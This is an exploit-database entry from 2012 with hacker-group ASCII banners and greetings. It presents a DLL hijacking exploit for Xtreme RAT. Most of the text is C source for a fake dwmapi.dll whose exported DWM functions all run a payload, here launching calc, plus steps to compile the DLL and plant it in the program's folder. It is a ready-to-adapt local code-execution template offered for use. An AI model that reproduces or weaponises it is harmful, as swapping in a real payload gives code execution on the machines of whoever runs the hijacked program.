Xtreme RAT DLL hijacking exploit that leverages dwmapi.dll.
8b4de6d790242ab62bec87ec54c4c4ca2a19e0fbb0edbeac796bf71a1e27d4b1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################
#Title : Xtreme RAT DLL Hijacking Exploit (dwmapi.dll)
#Author : anT!-Tr0J4n
#Email : EGypT-S3curity@hotmail.com
Date : 16/03/2012
#Category : Local Exploit
#Home : http://1337day.com
#Software : http://sites.google.com/site/nxtremerat
#########################################################
[>>] Compile code as dwmapi.dll
[>>] Move DLL file to the directory where Xtreme RAT is installed
[>>] check the result --> [ Your System 0wn3d BY anT!-Tr0J4n ]
dwmapi.dll code ;
*/
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void DwmDefWindowProc() { evil(); }
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void DwmEnableComposition() { evil(); }
DLLIMPORT void DwmEnableMMCSS() { evil(); }
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void DwmGetColorizationColor() { evil(); }
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void DwmGetWindowAttribute() { evil(); }
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void DwmRegisterThumbnail() { evil(); }
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void DwmSetPresentParameters() { evil(); }
DLLIMPORT void DwmSetWindowAttribute() { evil(); }
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
=-=-=-=-=-=-=-=-=-=- =-=-=-=-=-=-= Greets To =-=-==-==-=-=-=-==-=-=-=-=
[ >> ]-> * r0073r * CrosS * Sid3^effectS * r4dc0re *Indoushka * KnocKout
* eXeSoul * KedAns-Dz * eidelweiss * SeeMe * XroGuE * agix *# gunslinger_ *
* Sn!pEr.S!Te * ZoRLu * Kalashinkov3 * Angel Injection
[ >> ]-> Dev-Point.com Team # All My Friends #
=-=-==-=-=-==-=-=-=-==-=-=-==-==-=-=-=-==-=-=-=-==-=-=-=-=-=-=-=-=